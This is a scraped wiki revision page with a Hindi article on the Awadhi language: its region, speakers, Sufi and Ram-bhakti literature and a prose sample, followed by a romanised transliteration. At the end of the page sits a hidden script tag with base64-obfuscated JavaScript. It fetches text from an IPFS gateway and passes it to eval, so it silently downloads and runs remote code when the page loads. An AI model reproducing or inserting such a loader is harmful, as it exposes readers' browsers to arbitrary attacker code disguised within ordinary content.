Difference between revisions of "अवधी भाषा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
 
'''[[अवध]] क्षेत्र''' की [[भाषा]] '''अवधी''' कहलाती है, जो [[हिन्दी]] की एक उपभाषा है। अवधी का प्राचीन [[साहित्य]] बड़ा संपन्न है। इसमें भक्ति काव्य और प्रेमाख्यान काव्य दोनों का विकास हुआ। भक्तिकाव्य का शिरोमणि ग्रंथ [[तुलसीदास|गोस्वामी तुलसीदास]] कृत ‘[[रामचरितमानस]]’ है।  
 
'''[[अवध]] क्षेत्र''' की [[भाषा]] '''अवधी''' कहलाती है, जो [[हिन्दी]] की एक उपभाषा है। अवधी का प्राचीन [[साहित्य]] बड़ा संपन्न है। इसमें भक्ति काव्य और प्रेमाख्यान काव्य दोनों का विकास हुआ। भक्तिकाव्य का शिरोमणि ग्रंथ [[तुलसीदास|गोस्वामी तुलसीदास]] कृत ‘[[रामचरितमानस]]’ है।  
  
[[मलूकदास]] आदि संतों ने भी इसी भाषा में रचनाएं कीं। प्रेमाख्यान का प्रतिनिधि ग्रंथ [[मलिक मुहम्मद जायसी]] रचित ‘[[पद्मावत]]’ है, जिसकी रचना ‘रामचरितमानस’  से चौंतीस वर्ष पहले हुई। अवधी की यह संपन्न परंपरा आज भी चली आ रही है
+
[[मलूकदास]] आदि संतों ने भी इसी भाषा में रचनाएं कीं। प्रेमाख्यान का प्रतिनिधि ग्रंथ [[मलिक मुहम्मद जायसी]] रचित ‘[[पद्मावत]]’ है, जिसकी रचना ‘रामचरितमानस’  से चौंतीस वर्ष पहले हुई। अवधी की यह संपन्न परंपरा आज भी चली आ रही है। 
 +
==संक्षिप्त परिचय==
 +
*'''केन्द्र'''— [[अयोध्या]]/अवध
 +
*'''बोलने वालों की संख्या'''— 2 करोड़
 +
*देश के बाहर फीजी में अवधी बोलने वाले लोग हैं।
 +
*'''साहित्य'''— सूफ़ी काव्य, रामभक्ति काव्य। अवधी में प्रबन्ध काव्य परम्परा विशेषतः विकसित हुई।
 +
*'''रचनाकार'''— सूफ़ी कवि— मुल्ला दाउद ('चंदायन'), [[मलिक मुहम्मद जायसी|जायसी]] ('[[पद्मावत -जायसी|पद्मावत]]'), क़ुत्बन ('मृगावती'), उसमान ('चित्रावली'), रामभक्त कवि— [[तुलसीदास]] ('[[रामचरितमानस]]')
 +
*'''नमूना'''— एक गाँव मा एक अहिर रहा। ऊ बड़ा भोंग रहा। सबेरे जब सोय के उठै तो पहले अपने महतारी का चार टन्नी धमकाय दिये तब कौनो काम करत रहा। बेचारी बहुत पुरनिया रही नाहीं तौ का मज़ाल रहा केऊ देहिं पै तिरिन छुआय देत।
 +
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{भाषा और लिपि}}
 
{{भाषा और लिपि}}

Latest revision as of 14:24, 30 May 2017

avadh kshetr ki bhasha avadhi kahalati hai, jo hindi ki ek upabhasha hai. avadhi ka prachin sahity b da sanpann hai. isamean bhakti kavy aur premakhyan kavy donoan ka vikas hua. bhaktikavy ka shiromani granth gosvami tulasidas krit ‘ramacharitamanas’ hai.

malookadas adi santoan ne bhi isi bhasha mean rachanaean kian. premakhyan ka pratinidhi granth malik muhammad jayasi rachit ‘padmavat’ hai, jisaki rachana ‘ramacharitamanas’ se chauantis varsh pahale huee. avadhi ki yah sanpann paranpara aj bhi chali a rahi hai.

sankshipt parichay

  • kendrayodhya/avadh
  • bolane valoan ki sankhya— 2 karo d
  • desh ke bahar phiji mean avadhi bolane vale log haian.
  • sahity— soofi kavy, ramabhakti kavy. avadhi mean prabandh kavy parampara visheshatah vikasit huee.
  • rachanakar— soofi kavi— mulla daud ('chandayan'), jayasi ('padmavat'), qutban ('mrigavati'), usaman ('chitravali'), ramabhakt kavi— tulasidas ('ramacharitamanas').
  • namoona— ek gaanv ma ek ahir raha. oo b da bhoang raha. sabere jab soy ke uthai to pahale apane mahatari ka char tanni dhamakay diye tab kauno kam karat raha. bechari bahut puraniya rahi nahian tau ka mazal raha keoo dehian pai tirin chhuay det.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>